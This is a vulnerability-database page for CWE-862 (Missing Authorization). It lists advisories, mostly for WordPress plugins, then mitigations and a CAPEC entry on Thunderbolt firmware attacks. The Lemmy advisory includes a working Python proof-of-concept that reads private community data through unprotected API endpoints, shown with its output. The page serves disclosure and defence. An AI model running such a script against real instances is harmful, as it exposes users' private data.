Common Weakness Enumeration

CWE-862

Allowed-with-Review

Missing Authorization

Abstraction: Class · Status: Incomplete

The product does not perform an authorization check when an actor attempts to access a resource or perform an action.

14622 vulnerabilities reference this CWE, most recent first.

GHSA-95HR-5VRW-GPFQ

Vulnerability from github – Published: 2022-05-13 01:41 – Updated: 2025-04-20 03:45
VLAI
Details

Vulnerability in wordpress plugin DTracker v1.5, The code dtracker/save_contact.php doesn't check that the user is authorized before injecting new contacts into the wp_contact table.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2017-1002006"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-862"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2017-09-14T13:29:00Z",
    "severity": "HIGH"
  },
  "details": "Vulnerability in wordpress plugin DTracker v1.5, The code dtracker/save_contact.php doesn\u0027t check that the user is authorized before injecting new contacts into the wp_contact table.",
  "id": "GHSA-95hr-5vrw-gpfq",
  "modified": "2025-04-20T03:45:17Z",
  "published": "2022-05-13T01:41:17Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-1002006"
    },
    {
      "type": "WEB",
      "url": "https://wordpress.org/plugins/dtracker"
    },
    {
      "type": "WEB",
      "url": "http://www.securityfocus.com/bid/96890"
    },
    {
      "type": "WEB",
      "url": "http://www.vapidlabs.com/advisory.php?v=186"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-95MP-MXQ2-VR8J

Vulnerability from github – Published: 2024-05-06 21:30 – Updated: 2026-04-28 21:35
VLAI
Details

Missing Authorization vulnerability in A WP Life Video Gallery – Api Gallery, YouTube and Vimeo, Link Gallery.This issue affects Video Gallery – Api Gallery, YouTube and Vimeo, Link Gallery: from n/a through 1.5.3.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2024-34377"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-862"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2024-05-06T19:15:09Z",
    "severity": "MODERATE"
  },
  "details": "Missing Authorization vulnerability in A WP Life Video Gallery \u2013 Api Gallery, YouTube and Vimeo, Link Gallery.This issue affects Video Gallery \u2013 Api Gallery, YouTube and Vimeo, Link Gallery: from n/a through 1.5.3.",
  "id": "GHSA-95mp-mxq2-vr8j",
  "modified": "2026-04-28T21:35:04Z",
  "published": "2024-05-06T21:30:38Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-34377"
    },
    {
      "type": "WEB",
      "url": "https://patchstack.com/database/vulnerability/new-video-gallery/wordpress-video-gallery-api-gallery-youtube-and-vimeo-link-gallery-plugin-1-5-3-broken-access-control-vulnerability?_s_id=cve"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-95PW-WCGR-8XPG

Vulnerability from github – Published: 2026-03-05 06:30 – Updated: 2026-03-09 15:30
VLAI
Details

Missing Authorization vulnerability in designthemes DesignThemes Booking Manager designthemes-booking-manager allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects DesignThemes Booking Manager: from n/a through <= 2.0.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2026-27388"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-862"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-03-05T06:16:28Z",
    "severity": "HIGH"
  },
  "details": "Missing Authorization vulnerability in designthemes DesignThemes Booking Manager designthemes-booking-manager allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects DesignThemes Booking Manager: from n/a through \u003c= 2.0.",
  "id": "GHSA-95pw-wcgr-8xpg",
  "modified": "2026-03-09T15:30:32Z",
  "published": "2026-03-05T06:30:26Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27388"
    },
    {
      "type": "WEB",
      "url": "https://patchstack.com/database/Wordpress/Plugin/designthemes-booking-manager/vulnerability/wordpress-designthemes-booking-manager-plugin-2-0-broken-access-control-vulnerability?_s_id=cve"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-95Q7-RQP4-3W49

Vulnerability from github – Published: 2024-04-29 12:30 – Updated: 2026-04-28 21:35
VLAI
Details

Missing Authorization vulnerability in Tips and Tricks HQ Easy Accept Payments.This issue affects Easy Accept Payments: from n/a through 4.9.10.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2024-33591"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-862"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2024-04-29T10:15:07Z",
    "severity": "HIGH"
  },
  "details": "Missing Authorization vulnerability in Tips and Tricks HQ Easy Accept Payments.This issue affects Easy Accept Payments: from n/a through 4.9.10.",
  "id": "GHSA-95q7-rqp4-3w49",
  "modified": "2026-04-28T21:35:00Z",
  "published": "2024-04-29T12:30:35Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-33591"
    },
    {
      "type": "WEB",
      "url": "https://patchstack.com/database/vulnerability/wordpress-easy-paypal-payment-or-donation-accept-plugin/wordpress-easy-accept-payments-for-paypal-plugin-4-9-10-broken-access-control-vulnerability?_s_id=cve"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-95Q8-X6R6-672M

Vulnerability from github – Published: 2026-05-06 22:22 – Updated: 2026-06-08 23:39
VLAI
Summary
Lemmy may expose private community data through community, saved, liked, and modlog API views
Details

NOTE: Only affects development version.

Summary

Lemmy applies private-community checks in PostView and CommentView, but several adjacent API views skip the accepted-follower filter. Bob, a registered user who is not an accepted follower, can read private community sidebar and summary fields. Alice, a former accepted follower, can still read saved and liked private post bodies after she leaves. An unauthenticated visitor can read private community metadata and removed private post names through the modlog.

Details

CommunityView::read() and CommunityQuery::list() call visible_communities_only(), but they do not add the private-community filter used by post and comment reads:

query = my_local_user.visible_communities_only(query);
query.first(conn).await.with_lemmy_type(LemmyErrorType::NotFound)

PersonSavedCombinedQuery::list() and PersonLikedCombinedQuery::list() join community_actions, but they only filter by the requesting person id. They do not require community_actions.follow_state = Accepted when the community has visibility = Private.

The modlog query returns ListingType::All without a visibility predicate:

query = match self.listing_type.unwrap_or(ListingType::All) {
  ListingType::All => query,

The control paths show the expected check. PostView::read() and CommentView::read() both filter private communities to accepted followers:

community::visibility
  .ne(CommunityVisibility::Private)
  .or(community_actions::follow_state.eq(CommunityFollowerState::Accepted))

Proof of Concept

The following script reproduces the leak against a fresh Lemmy instance. Tested against dessalines/lemmy:nightly with the default setup account from the sample config. The script opens registration so it can create Alice and Bob.

import requests, random, string

BASE = "http://127.0.0.1:8536/api/v4"  # change to the target Lemmy URL
ADMIN_USER = "lemmy"
ADMIN_PASS = "lemmylemmy"
PASSWORD = "Password123456!"

def req(method, path, token=None, params=None, **body):
    headers = {}
    if token:
        headers["Authorization"] = "Bearer " + token
    return requests.request(method, BASE + path, headers=headers, params=params, json=body or None)

def register(name):
    r = req("POST", "/account/auth/register", username=name, password=PASSWORD,
            password_verify=PASSWORD, email=name + "@example.test")
    r.raise_for_status()
    token = r.json()["jwt"]
    person_id = req("GET", "/account", token).json()["local_user_view"]["person"]["id"]
    return token, person_id

def show(label, response, marker):
    text = response.text
    print("\n" + label + ": HTTP", response.status_code)
    print(text[:700])
    print("contains marker:", marker in text)

suffix = "poc" + "".join(random.choice(string.ascii_lowercase) for _ in range(6))
admin = req("POST", "/account/auth/login", username_or_email=ADMIN_USER, password=ADMIN_PASS).json()["jwt"]
req("PUT", "/site", admin, registration_mode="open", email_verification_required=False)

alice, alice_id = register("alice" + suffix)
bob, _ = register("bob" + suffix)
secret = "SECRET_" + suffix

community = req("POST", "/community", admin,
                name="priv" + suffix,
                title="Private Proof " + suffix,
                sidebar=secret + " sidebar",
                summary=secret + " summary",
                visibility="private").json()["community_view"]["community"]
community_id = community["id"]
post = req("POST", "/post", admin, name="secret post " + suffix,
           community_id=community_id, body=secret + " post body").json()["post_view"]["post"]
post_id = post["id"]

show("Bob reads private community metadata", req("GET", "/community", bob, params={"id": community_id}), secret)
show("Bob direct post read control", req("GET", "/post", bob, params={"id": post_id}), secret)

req("POST", "/community/follow", alice, community_id=community_id, follow=True)
req("POST", "/community/pending_follows/approve", admin,
    community_id=community_id, follower_id=alice_id, approve=True)
req("PUT", "/post/save", alice, post_id=post_id, save=True)
req("POST", "/post/like", alice, post_id=post_id, is_upvote=True)
req("POST", "/community/follow", alice, community_id=community_id, follow=False)

show("Alice direct post read after leaving", req("GET", "/post", alice, params={"id": post_id}), secret)
show("Alice saved list after leaving", req("GET", "/account/saved", alice), secret)
show("Alice liked list after leaving", req("GET", "/account/liked", alice), secret)

mod_comm = req("POST", "/community", admin,
               name="modlog" + suffix,
               title="Private Modlog " + suffix,
               sidebar=secret + " modlog sidebar",
               summary=secret + " modlog summary",
               visibility="private").json()["community_view"]["community"]
mod_post = req("POST", "/post", admin, name=secret + " removed post",
               community_id=mod_comm["id"], body="body").json()["post_view"]["post"]
req("POST", "/post/remove", admin, post_id=mod_post["id"], removed=True, reason="poc")
show("Unauthenticated modlog", req("GET", "/modlog", params={"listing_type": "all", "limit": 50}), secret)

Output:

Bob reads private community metadata: HTTP 200
contains marker: True
Bob direct post read control: HTTP 404
contains marker: False
Alice direct post read after leaving: HTTP 404
contains marker: False
Alice saved list after leaving: HTTP 200
contains marker: True
Alice liked list after leaving: HTTP 200
contains marker: True
Unauthenticated modlog: HTTP 200
contains marker: True

Impact

Bob can read private community descriptions and sidebars before a moderator approves him. Alice can leave a private community, or a moderator can remove her, and Lemmy still returns private post bodies that Alice saved or liked while she was a member. An unauthenticated visitor can use the public modlog to discover private community metadata and removed private post names.

Recommended Fix

Apply the same private-community filter used by PostView and CommentView to CommunityView::read(), CommunityQuery::list(), PersonSavedCombinedQuery::list(), PersonLikedCombinedQuery::list(), and the ListingType::All branch of the modlog query. Admins and accepted followers should keep access. Other callers should receive the same 404 behavior as GET /post and GET /comment.


Found by aisafe.io

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "crates.io",
        "name": "lemmy_api"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "last_affected": "0.19.1-rc.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [],
  "database_specific": {
    "cwe_ids": [
      "CWE-862"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-05-06T22:22:41Z",
    "nvd_published_at": null,
    "severity": "MODERATE"
  },
  "details": "**NOTE**: Only affects development version.\n\n## Summary\n\nLemmy applies private-community checks in `PostView` and `CommentView`, but several adjacent API views skip the accepted-follower filter. Bob, a registered user who is not an accepted follower, can read private community `sidebar` and `summary` fields. Alice, a former accepted follower, can still read saved and liked private post bodies after she leaves. An unauthenticated visitor can read private community metadata and removed private post names through the modlog.\n\n## Details\n\n`CommunityView::read()` and `CommunityQuery::list()` call `visible_communities_only()`, but they do not add the private-community filter used by post and comment reads:\n\n```rust\nquery = my_local_user.visible_communities_only(query);\nquery.first(conn).await.with_lemmy_type(LemmyErrorType::NotFound)\n```\n\n`PersonSavedCombinedQuery::list()` and `PersonLikedCombinedQuery::list()` join `community_actions`, but they only filter by the requesting person id. They do not require `community_actions.follow_state = Accepted` when the community has `visibility = Private`.\n\nThe modlog query returns `ListingType::All` without a visibility predicate:\n\n```rust\nquery = match self.listing_type.unwrap_or(ListingType::All) {\n  ListingType::All =\u003e query,\n```\n\nThe control paths show the expected check. `PostView::read()` and `CommentView::read()` both filter private communities to accepted followers:\n\n```rust\ncommunity::visibility\n  .ne(CommunityVisibility::Private)\n  .or(community_actions::follow_state.eq(CommunityFollowerState::Accepted))\n```\n\n## Proof of Concept\n\nThe following script reproduces the leak against a fresh Lemmy instance. Tested against `dessalines/lemmy:nightly` with the default setup account from the sample config. The script opens registration so it can create Alice and Bob.\n\n```python\nimport requests, random, string\n\nBASE = \"http://127.0.0.1:8536/api/v4\"  # change to the target Lemmy URL\nADMIN_USER = \"lemmy\"\nADMIN_PASS = \"lemmylemmy\"\nPASSWORD = \"Password123456!\"\n\ndef req(method, path, token=None, params=None, **body):\n    headers = {}\n    if token:\n        headers[\"Authorization\"] = \"Bearer \" + token\n    return requests.request(method, BASE + path, headers=headers, params=params, json=body or None)\n\ndef register(name):\n    r = req(\"POST\", \"/account/auth/register\", username=name, password=PASSWORD,\n            password_verify=PASSWORD, email=name + \"@example.test\")\n    r.raise_for_status()\n    token = r.json()[\"jwt\"]\n    person_id = req(\"GET\", \"/account\", token).json()[\"local_user_view\"][\"person\"][\"id\"]\n    return token, person_id\n\ndef show(label, response, marker):\n    text = response.text\n    print(\"\\n\" + label + \": HTTP\", response.status_code)\n    print(text[:700])\n    print(\"contains marker:\", marker in text)\n\nsuffix = \"poc\" + \"\".join(random.choice(string.ascii_lowercase) for _ in range(6))\nadmin = req(\"POST\", \"/account/auth/login\", username_or_email=ADMIN_USER, password=ADMIN_PASS).json()[\"jwt\"]\nreq(\"PUT\", \"/site\", admin, registration_mode=\"open\", email_verification_required=False)\n\nalice, alice_id = register(\"alice\" + suffix)\nbob, _ = register(\"bob\" + suffix)\nsecret = \"SECRET_\" + suffix\n\ncommunity = req(\"POST\", \"/community\", admin,\n                name=\"priv\" + suffix,\n                title=\"Private Proof \" + suffix,\n                sidebar=secret + \" sidebar\",\n                summary=secret + \" summary\",\n                visibility=\"private\").json()[\"community_view\"][\"community\"]\ncommunity_id = community[\"id\"]\npost = req(\"POST\", \"/post\", admin, name=\"secret post \" + suffix,\n           community_id=community_id, body=secret + \" post body\").json()[\"post_view\"][\"post\"]\npost_id = post[\"id\"]\n\nshow(\"Bob reads private community metadata\", req(\"GET\", \"/community\", bob, params={\"id\": community_id}), secret)\nshow(\"Bob direct post read control\", req(\"GET\", \"/post\", bob, params={\"id\": post_id}), secret)\n\nreq(\"POST\", \"/community/follow\", alice, community_id=community_id, follow=True)\nreq(\"POST\", \"/community/pending_follows/approve\", admin,\n    community_id=community_id, follower_id=alice_id, approve=True)\nreq(\"PUT\", \"/post/save\", alice, post_id=post_id, save=True)\nreq(\"POST\", \"/post/like\", alice, post_id=post_id, is_upvote=True)\nreq(\"POST\", \"/community/follow\", alice, community_id=community_id, follow=False)\n\nshow(\"Alice direct post read after leaving\", req(\"GET\", \"/post\", alice, params={\"id\": post_id}), secret)\nshow(\"Alice saved list after leaving\", req(\"GET\", \"/account/saved\", alice), secret)\nshow(\"Alice liked list after leaving\", req(\"GET\", \"/account/liked\", alice), secret)\n\nmod_comm = req(\"POST\", \"/community\", admin,\n               name=\"modlog\" + suffix,\n               title=\"Private Modlog \" + suffix,\n               sidebar=secret + \" modlog sidebar\",\n               summary=secret + \" modlog summary\",\n               visibility=\"private\").json()[\"community_view\"][\"community\"]\nmod_post = req(\"POST\", \"/post\", admin, name=secret + \" removed post\",\n               community_id=mod_comm[\"id\"], body=\"body\").json()[\"post_view\"][\"post\"]\nreq(\"POST\", \"/post/remove\", admin, post_id=mod_post[\"id\"], removed=True, reason=\"poc\")\nshow(\"Unauthenticated modlog\", req(\"GET\", \"/modlog\", params={\"listing_type\": \"all\", \"limit\": 50}), secret)\n\n```\n\nOutput:\n\n```text\nBob reads private community metadata: HTTP 200\ncontains marker: True\nBob direct post read control: HTTP 404\ncontains marker: False\nAlice direct post read after leaving: HTTP 404\ncontains marker: False\nAlice saved list after leaving: HTTP 200\ncontains marker: True\nAlice liked list after leaving: HTTP 200\ncontains marker: True\nUnauthenticated modlog: HTTP 200\ncontains marker: True\n```\n\n## Impact\n\nBob can read private community descriptions and sidebars before a moderator approves him. Alice can leave a private community, or a moderator can remove her, and Lemmy still returns private post bodies that Alice saved or liked while she was a member. An unauthenticated visitor can use the public modlog to discover private community metadata and removed private post names.\n\n## Recommended Fix\n\nApply the same private-community filter used by `PostView` and `CommentView` to `CommunityView::read()`, `CommunityQuery::list()`, `PersonSavedCombinedQuery::list()`, `PersonLikedCombinedQuery::list()`, and the `ListingType::All` branch of the modlog query. Admins and accepted followers should keep access. Other callers should receive the same `404` behavior as `GET /post` and `GET /comment`.\n\n---\n*Found by [aisafe.io](https://aisafe.io)*",
  "id": "GHSA-95q8-x6r6-672m",
  "modified": "2026-06-08T23:39:41Z",
  "published": "2026-05-06T22:22:41Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/LemmyNet/lemmy/security/advisories/GHSA-95q8-x6r6-672m"
    },
    {
      "type": "WEB",
      "url": "https://github.com/LemmyNet/lemmy/commit/637151121a8e27b2b8c95e98d6f86966b31b4a6d"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/LemmyNet/lemmy"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Lemmy may expose private community data through community, saved, liked, and modlog API views"
}

GHSA-95Q9-4QH9-HR86

Vulnerability from github – Published: 2025-12-24 15:30 – Updated: 2026-01-20 15:32
VLAI
Details

Missing Authorization vulnerability in FolioVision FV Simpler SEO fv-all-in-one-seo-pack allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects FV Simpler SEO: from n/a through <= 1.9.6.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-68579"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-862"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-12-24T13:16:25Z",
    "severity": "HIGH"
  },
  "details": "Missing Authorization vulnerability in FolioVision FV Simpler SEO fv-all-in-one-seo-pack allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects FV Simpler SEO: from n/a through \u003c= 1.9.6.",
  "id": "GHSA-95q9-4qh9-hr86",
  "modified": "2026-01-20T15:32:40Z",
  "published": "2025-12-24T15:30:42Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68579"
    },
    {
      "type": "WEB",
      "url": "https://patchstack.com/database/Wordpress/Plugin/fv-all-in-one-seo-pack/vulnerability/wordpress-fv-simpler-seo-plugin-1-9-6-broken-access-control-vulnerability?_s_id=cve"
    },
    {
      "type": "WEB",
      "url": "https://vdp.patchstack.com/database/Wordpress/Plugin/fv-all-in-one-seo-pack/vulnerability/wordpress-fv-simpler-seo-plugin-1-9-6-broken-access-control-vulnerability?_s_id=cve"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-95X7-MH78-7W2R

Vulnerability from github – Published: 2022-10-25 20:13 – Updated: 2022-10-27 18:35
VLAI
Summary
OpenFGA subject to Information Disclosure via streamed-list-objects endpoint
Details

Overview

During our internal security assessment, it was discovered that streamed-list-objects endpoint was not validating the authorization header resulting in the disclosure of objects in the store.

Am I Affected?

You are affected by this vulnerability if you are using openfga/openfga version v0.2.3 or prior and you are exposing the OpenFGA service to the internet.

How to fix that?

Upgrade to version v0.2.4.

Backward Compatibility

This update is backward compatible.

Show details on source website

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 0.2.3"
      },
      "package": {
        "ecosystem": "Go",
        "name": "github.com/openfga/openfga"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.2.4"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2022-39340"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-285",
      "CWE-862",
      "CWE-863"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2022-10-25T20:13:38Z",
    "nvd_published_at": "2022-10-25T17:15:00Z",
    "severity": "MODERATE"
  },
  "details": "### Overview\nDuring our internal security assessment, it was discovered that `streamed-list-objects` endpoint was not validating the authorization header resulting in the disclosure of objects in the store.\n\n### Am I Affected?\nYou are affected by this vulnerability if you are using `openfga/openfga` version `v0.2.3` or prior and you are exposing the OpenFGA service to the internet.\n\n### How to fix that?\nUpgrade to version `v0.2.4`.\n\n### Backward Compatibility\nThis update is backward compatible.",
  "id": "GHSA-95x7-mh78-7w2r",
  "modified": "2022-10-27T18:35:10Z",
  "published": "2022-10-25T20:13:38Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/openfga/openfga/security/advisories/GHSA-95x7-mh78-7w2r"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-39340"
    },
    {
      "type": "WEB",
      "url": "https://github.com/openfga/openfga/commit/779d73d4b6d067ee042ec9b59fec707eed71e42f"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/openfga/openfga"
    },
    {
      "type": "WEB",
      "url": "https://github.com/openfga/openfga/releases/tag/v0.2.4"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "OpenFGA subject to Information Disclosure via streamed-list-objects endpoint"
}

GHSA-95XF-VJ6C-3PJ7

Vulnerability from github – Published: 2025-07-04 18:30 – Updated: 2025-07-08 18:31
VLAI
Details

SetTranslationHandler.php does not validate that the user is an election admin, allowing any (even unauthenticated) user to change election-related translation text. While partially broken in newer MediaWiki versions, the check is still missing.

This issue affects Mediawiki - SecurePoll extension: from 1.39.X before 1.39.13, from 1.42.X before 1.42.7, from 1.43.X before 1.43.2.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-53485"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-862"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-07-04T18:15:23Z",
    "severity": "HIGH"
  },
  "details": "SetTranslationHandler.php does not validate that the user is an election admin, allowing any (even unauthenticated) user to change election-related translation text. While partially broken in newer MediaWiki versions, the check is still missing.\n\n\n\n\nThis issue affects Mediawiki - SecurePoll extension: from 1.39.X before 1.39.13, from 1.42.X before 1.42.7, from 1.43.X before 1.43.2.",
  "id": "GHSA-95xf-vj6c-3pj7",
  "modified": "2025-07-08T18:31:07Z",
  "published": "2025-07-04T18:30:56Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-53485"
    },
    {
      "type": "WEB",
      "url": "https://gerrit.wikimedia.org/r/149668"
    },
    {
      "type": "WEB",
      "url": "https://phabricator.wikimedia.org/T392341"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-9646-V778-VV65

Vulnerability from github – Published: 2026-01-23 15:31 – Updated: 2026-01-27 18:32
VLAI
Details

Missing Authorization vulnerability in Horea Radu Materialis Companion materialis-companion allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Materialis Companion: from n/a through <= 1.3.52.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2026-24543"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-862"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-01-23T15:16:10Z",
    "severity": "MODERATE"
  },
  "details": "Missing Authorization vulnerability in Horea Radu Materialis Companion materialis-companion allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Materialis Companion: from n/a through \u003c= 1.3.52.",
  "id": "GHSA-9646-v778-vv65",
  "modified": "2026-01-27T18:32:12Z",
  "published": "2026-01-23T15:31:36Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-24543"
    },
    {
      "type": "WEB",
      "url": "https://patchstack.com/database/Wordpress/Plugin/materialis-companion/vulnerability/wordpress-materialis-companion-plugin-1-3-52-broken-access-control-vulnerability?_s_id=cve"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-965R-FRW4-RX83

Vulnerability from github – Published: 2025-03-03 09:30 – Updated: 2026-04-01 18:33
VLAI
Details

Missing Authorization vulnerability in SEO Squirrly SEO Plugin by Squirrly SEO.This issue affects SEO Plugin by Squirrly SEO: from n/a through 12.4.05.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-24654"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-862"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-03-03T09:15:39Z",
    "severity": "HIGH"
  },
  "details": "Missing Authorization vulnerability in SEO Squirrly SEO Plugin by Squirrly SEO.This issue affects SEO Plugin by Squirrly SEO: from n/a through 12.4.05.",
  "id": "GHSA-965r-frw4-rx83",
  "modified": "2026-04-01T18:33:50Z",
  "published": "2025-03-03T09:30:36Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-24654"
    },
    {
      "type": "WEB",
      "url": "https://patchstack.com/database/wordpress/plugin/squirrly-seo/vulnerability/wordpress-squirrly-seo-plugin-12-4-05-broken-access-control-vulnerability?_s_id=cve"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N",
      "type": "CVSS_V3"
    }
  ]
}

Mitigation
Architecture and Design
  • Divide the product into anonymous, normal, privileged, and administrative areas. Reduce the attack surface by carefully mapping roles with data and functionality. Use role-based access control (RBAC) [REF-229] to enforce the roles at the appropriate boundaries.
  • Note that this approach may not protect against horizontal authorization, i.e., it will not protect a user from attacking others with the same role.
Mitigation
Architecture and Design

Ensure that access control checks are performed related to the business logic. These checks may be different than the access control checks that are applied to more generic resources such as files, connections, processes, memory, and database records. For example, a database may restrict access for medical records to a specific database user, but each record might only be intended to be accessible to the patient and the patient's doctor [REF-7].

Mitigation MIT-4.4
Architecture and Design

Strategy: Libraries or Frameworks

  • Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.
  • For example, consider using authorization frameworks such as the JAAS Authorization Framework [REF-233] and the OWASP ESAPI Access Control feature [REF-45].
Mitigation
Architecture and Design
  • For web applications, make sure that the access control mechanism is enforced correctly at the server side on every page. Users should not be able to access any unauthorized functionality or information by simply requesting direct access to that page.
  • One way to do this is to ensure that all pages containing sensitive information are not cached, and that all such pages restrict access to requests that are accompanied by an active and authenticated session token associated with a user who has the required permissions to access that page.
Mitigation
System Configuration Installation

Use the access control capabilities of your operating system and server environment and define your access control lists accordingly. Use a "default deny" policy when defining these ACLs.

CAPEC-665: Exploitation of Thunderbolt Protection Flaws

An adversary leverages a firmware weakness within the Thunderbolt protocol, on a computing device to manipulate Thunderbolt controller firmware in order to exploit vulnerabilities in the implementation of authorization and verification schemes within Thunderbolt protection mechanisms. Upon gaining physical access to a target device, the adversary conducts high-level firmware manipulation of the victim Thunderbolt controller SPI (Serial Peripheral Interface) flash, through the use of a SPI Programing device and an external Thunderbolt device, typically as the target device is booting up. If successful, this allows the adversary to modify memory, subvert authentication mechanisms, spoof identities and content, and extract data and memory from the target device. Currently 7 major vulnerabilities exist within Thunderbolt protocol with 9 attack vectors as noted in the Execution Flow.